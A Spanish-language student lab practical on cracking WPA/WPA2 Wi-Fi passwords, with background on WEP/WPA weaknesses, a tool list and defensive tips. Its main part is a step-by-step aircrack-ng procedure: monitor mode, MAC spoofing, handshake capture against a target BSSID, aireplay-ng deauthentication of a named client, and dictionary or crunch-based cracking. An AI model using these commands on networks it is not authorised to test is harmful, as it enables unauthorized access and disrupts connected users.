PRÁCTICA - Crackear la contraseña del Wifi con WPA/WPA2

Crackear una contraseña nunca es una actividad lícita, es un robo de datos y está penado. Esto solo debe servir como último recurso cuando un usuario pierde su contraseña y no puede recuperarla.

Buscar más info en: https://byte-mind.net/cracking-de-wpa-wpa2-con-aircrack-ng/

Para realizar esta práctica necesitarás un dispositivo habilitado para la red inalámbrica, como un ordenador, portátil, Tablet, teléfono, etc. También deberás estar dentro del radio de transmisión de un punto de acceso de red inalámbrica. También requerirás de una interfaz o adaptador inalámbrico que permita la monitorización inalámbrica (modo promiscuo); la mayoría de los dispositivos (si la opción de red inalámbrica está activada) le proporcionarán una lista de redes disponibles.

Autenticación de red inalámbrica

Dado que la red es fácilmente accesible para todos los que tienen un dispositivo habilitado para la red inalámbrica, la mayoría de las redes están protegidas por contraseña. Algunas de las técnicas de autenticación más utilizadas son estas:

WEP

WEP es el acrónimo de Wired Equivalent Privacy. Fue desarrollado para los estándares IEEE 802.11 WLAN. Su objetivo era proporcionar la privacidad equivalente a la proporcionada por las redes cableadas. WEP funciona cifrando los datos transmitidos a través de la red para mantenerlos a salvo de escuchas.

Autenticación WEP

• Autenticación de sistema abierto (OSA): este método otorga acceso a la autenticación de estación solicitada en función de la política de acceso configurada.

• Autenticación de clave compartida (SKA): este método envía un desafío cifrado a la estación que solicita acceso. La estación cifra el desafío con su clave y luego responde. Si el desafío cifrado coincide con el valor de AP, se concede acceso.

Debilidad de WEP

WEP tiene fallas y vulnerabilidades de diseño significativas:

• La integridad de los paquetes se comprueba mediante la comprobación de redundancia cíclica (CRC32). La verificación de integridad CRC32 puede verse comprometida al capturar al menos dos paquetes. Los bits en el flujo cifrado y la suma de comprobación pueden ser modificados por el atacante para que el paquete sea aceptado por el sistema de autenticación. Esto conduce a un acceso no autorizado a la red.

• WEP utiliza el algoritmo de cifrado RC4 para crear cifrados de flujo. La entrada de cifrado de flujo se compone de un valor inicial (IV) y una clave secreta. La longitud del valor inicial (IV) es de 24 bits, mientras que la clave secreta puede ser de 40 bits o 104 bits. La longitud total tanto del valor inicial como del secreto puede ser de 64 bits o de 128 bits. El valor más bajo posible de la clave secreta hace que sea fácil descifrarla.

• Las combinaciones de valores iniciales débiles no cifran suficientemente. Esto los hace vulnerables a los ataques.

• WEP se basa en contraseñas; esto lo hace vulnerable a los ataques de diccionario.

• La administración de claves está mal implementada. Cambiar las teclas, especialmente en redes grandes, es un desafío. WEP no proporciona un sistema centralizado de administración de claves.

• Los valores iniciales se pueden reutilizar

Debido a estas fallas de seguridad, WEP ha quedado obsoleto en favor de WPA.

WPA/WPA2

WPA es el acrónimo de Wi-Fi Protected Access. Es un protocolo de seguridad desarrollado por la Wi-Fi Alliance en respuesta a las debilidades encontradas en WEP. Se utiliza para cifrar datos en WLAN 802.11.

Utiliza valores iniciales más altos de 48 bits en lugar de los 24 bits que utiliza WEP y claves temporales para cifrar paquetes.

Debilidades de WPA

• La implementación de prevención de colisiones se puede romper.

• Es vulnerable a ataques de denegación de servicio (DoS)

• Las claves previas a los recursos compartidos utilizan frases de contraseña. Las frases de contraseña débiles son vulnerables a los ataques de diccionario.

Desciframiento de claves WEP/WPA de red inalámbrica

Es posible descifrar las claves WEP/WPA/WPA2 utilizadas para obtener acceso a una red inalámbrica. Hacerlo requiere recursos de software y hardware. En la práctica que realizaremos, el éxito del ataque de piratería también puede depender de cuán activos e inactivos sean los usuarios de la red objetivo.

Existen algunas herramientas populares que pueden ayudarte a realizar este pirateo que son:

• Aircrack – (La que usaremos más adelante) rastreador de red y cracker WEP. Esta herramienta de hacker de contraseñas WiFi se puede descargar desde http://www.aircrack-ng.org/
• WEPCrack: este es un programa de hackers Wi-Fi de código abierto para romper las claves secretas WEP 802.11. Esta aplicación de hackers WiFi para PC es una implementación del ataque FMS. http://wepcrack.sourceforge.net/
• Kismet: este hacker de contraseñas WiFi en línea detecta redes inalámbricas tanto visibles como ocultas, rastrea paquetes y detecta intrusiones. https://www.kismetwireless.net/
• WebDecrypt: esta herramienta de pirateo de contraseñas WiFi utiliza ataques de diccionario activos para descifrar las claves WEP. Tiene su propio generador de claves e implementa filtros de paquetes para hackear la contraseña de WiFi. http://wepdecrypt.sourceforge.net/
• CowPatty: esta herramienta de descifrado de contraseñas WiFi se utiliza para descifrar claves precompartidas (PSK) mediante un ataque de fuerza bruta. http://wirelessdefence.org/Contents/coWPAttyMain.htm
• Cain & Abel: esta herramienta de hacker WiFi para PC se puede usar para decodificar archivos de captura de otros programas de rastreo como Wireshark. Los archivos de captura pueden contener tramas codificadas WEP o WPA-PSK. https://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml

Cómo proteger las redes inalámbricas

Ahora bien, esta práctica tiene que servirnos para darnos cuenta de la facilidad de crackeo de las redes así que, para minimizar los ataques a redes inalámbricas, una organización puede adoptar las siguientes directivas:

• Cambio de contraseñas predeterminadas que vienen con el hardware.

• Habilitación de mecanismos de autenticación.

• El acceso a la red puede restringirse permitiendo solo direcciones MAC registradas (mediante ACL).

• El uso de claves WEP y WPA-PSK fuertes, una combinación de símbolos, números y caracteres reduce la posibilidad de que las claves se descifren utilizando ataques de diccionario y fuerza bruta.

• El software de firewall también puede ayudar a reducir el acceso no autorizado.

El firewall nos protege de los accesos no autorizados

Crackear la contraseña

Vamos a proceder con la práctica de crackeo, el objetivo es capturar el protocolo de enlace de autenticación, ya sea WPA o WPA2, y posteriormente utilizar aircrack-ng para descifrar la clave previamente compartida. Esto podría realizarse de dos formas:

• activa -> se acelerará el proceso al desautenticar a un cliente inalámbrico existente.

• pasiva -> simplemente se esperará a que un cliente se autentifique en la red.

Los pasos para realizarla serán:

1. Iniciar la interfaz inalámbrica en modo monitor

2. Iniciar airodump-ng en el canal AP filtrando el bssid objectivo

3. Utilizar aireplay-ng para desautenticar al cliente

4. Utilizar aircrack-ng para descifrar la clave precompartida por el handshake

En mi caso he utilizado el sistema operativo Ubuntu Desktop 22.04.4 y la red víctima es la de alumnos de la academia cuya password es público para estos.

Interfaz inalámbrica en modo monitor

1.- Darnos permisos de usuario

sudo -s

2.- Instalamos el paquete de aircrack-ng

sudo apt-get install aircrack-ng

3.- Lo siguiente, antes de configurar la interfaz será matar todos los procesos que estén interfiriendo con nuestro dispositivo wifi, para ello escribimos este comando:

sudo airmon-ng check kill

Si el comando anterior da algún resultado lo ejecutamos de nuevo quedando así y no dándonos ningún resultado:

El comando mata lso procesos incorporados

Para ello lo primero que debemos hacer es sacar el nombre de la interfaz asociada:

iwconfig

Que nos mostrará algo así:

En este caso la interfaz de tarjeta inalámbrica se corresponde con la wlp2s0 que sera el nombre que utilizaremos a partir de ahora. Podemos verificarlo mejor con el comando:

sudo airmon-ng

Antes de ponerla en modo monitor, debemos reiniciarla desde el propio airmon, para detener nuestra interfaz wlp2s0:

airmon-ng stop wlp2s0

Y volvemos a activar nuestra interfaz wlp2s0:

airmon-ng start wlp2s0

Al terminar, escribimos iwconfig otra vez y observamos que nuestra interfaz ha cambiado a wlp2s0mon y debería aparecer el modo monitor activo:

El modo ha cambiado

(OPCIONAL) Tenemos la posibilidad de cambiar nuestra MAC para que sea menos reconocible así:

macchanger -r wlp2s0

Al volver a sacar la configuración de IPs con el siguiente comando deberiamos ver la nueva MAC asociada

ifconfig

Y sacamos el id de nuestra red

Escaneo de la red víctima

1.- Obtenemos los datos de la red victima

Ahora sí, deberíamos empezar a capturar la red víctima. Para ello el primer paso es generar una captura de datos de la interfaz:

airodump-ng wlp2s0mon

Cuyo resultado será:

La red que vamos a atacar es la marcada

Como puedes ver en la captura, aparecen múltiples redes wifi, cada una con su BSSID y ESSID asociados incluso en diferentes canales. Quedémonos con los datos de la red que nos interesan:

Datos red

ESSID= PL13R
BSSID= ash
CHANNEL= 6
ENCRYPTION= WPA2
CIPHER= CCMP
AUTH= PSK

Cuando terminemos, simplemente pulsamos CTRL+C para terminar el proceso.

2.- Nos mantenemos a la escucha de que un cliente se desconecte

Con el comando airodump-ng estamos en escucha de que un cliente se desconecte y se conecte a su modem

/home/alumno

airodump-ng -c 6 -w /home/alumno/Descargas/netdump --bssid E8:ED:D6:96:DF:F0 wlp2s0mon

Donde:

• -c -> indicamos el canal utilizado

• -–bssid -> indicamos el bssid de nuestro punto de acceso

• -w -> indicamos el nombre del fichero en el cual guardar los datos de la captura

• wlp2s0mon -> por último indicamos el nombre de la interfaz utilizada

Si todo ha funcionado, con esto se nos habrán creado una serie de archivos de datos, el que nos interesa es el netdump.cap:

El archivo .cap es donde estaran los datos del handshake encriptados

Como vemos en la siguiente captura, el método de autenticación utilizado es PSK que utilizaremos para llevar a cabo nuestro ataque:

Lo marcado en rojo es un dispositivo cercano conectado a la red

Desautenticar al cliente con aireplay-ng

El siguiente paso, en nuestro ataque activo, será ejecutar aireplay para desautenticar al cliente y forzarle a realizar de nuevo la conexión. Este paso es opcional, si tiene paciencia, puede esperar hasta que airodump capture una autenticación de uno o más clientes al punto de acceso. Al realizarlo de esta forma se acelera de forma efectiva el proceso. Si se da el caso en el que no hay ningún cliente conectado se deberá esperar a que al menos uno se conecte, ya que sino no será efectivo el ataque.

Este paso envía un mensaje al cliente indicando que ya no está conectado, lo que forzará que se autentifique de nuevo con el AP. La reautenticación es lo que generará el protocolo de enlace de autenticación de 4 vías que necesitamos recopilar para romper la clave precompartida WPA/WPA2.

No cierres la ventana del airodump, abre nueva pestaña en consola y ahora ejecutaremos entonces aireplay-ng:

aireplay-ng -0 1 -a E8:ED:D6:96:DF:F0 -c 3C:A0:67:3D:ED:5D wlp2s0mon 

Donde:

• -0 -> significa la desautenticación

• 1 -> es el número de deauths enviados para desautenticar, pero puede enviar tantos como desee

• -a -> se indica la dirección mac del punto de acceso (bssid)

• -c -> se indica la dirección mac del cliente (station)

• wlp2s0mon -> es el nombre de nuestra interfaz

Con suerte, se conseguirá que el cliente se reautentifique, forzando el protocolo de 4 vías. Puedes ver el fabricante del adaptador con la própia MAC, buscandolo con este enlace.

Con el fabricante podemos tratar de averiguar el dispositivo conectado

Cabe destacar que los paquetes de autenticación se envían directamente desde su PC a los clientes, por lo que deberá estar físicamente lo suficientemente cerca de los clientes y del punto de acceso.

Desencriptando la contraseñas a partir de los datos obtenidos

Con aircrack-ng desencriptamos las contraseñas obtenidas:

root@alumno: home/alumno/Descargas#

aircrack-ng -w rockyou.txt -b  *.cap

Donde:

• rockyou.txt -> Es un archivo con contraseñas probadas lo puedes descargar de aqui. Otra alternativa puede ser Kaonashi.
• netdump-01.cap -> Es el archivo que se genero con airodump-ng.

Si funciona, aircrack empezará a descifrar las contraseñas comparandolas con las contraseñas del diccionario:

En la captura se ve la cantidad de passwords testeadas, la actual y la encriptación.

Como alternativa podemos generar nuestro propio diccionario

Si no funciono con aircrack-ng intentamos con crunch:

crunch 10 10 -t %%%%%%%%%% 1234567890 | aircrack-ng -w - /root/eddy-01.cap -e infinitump398

Donde:

%%%%%%%%%% 1234567890 Es el tipo de encriptado (solo números del 1 al 10) eddy-01.cap Es el archivo que se genero con airodump-ng infinitump398 Nombre de la red victima

Adios Rockyou.txt - Bienvenido Kaonashi.txtSnifer@L4b's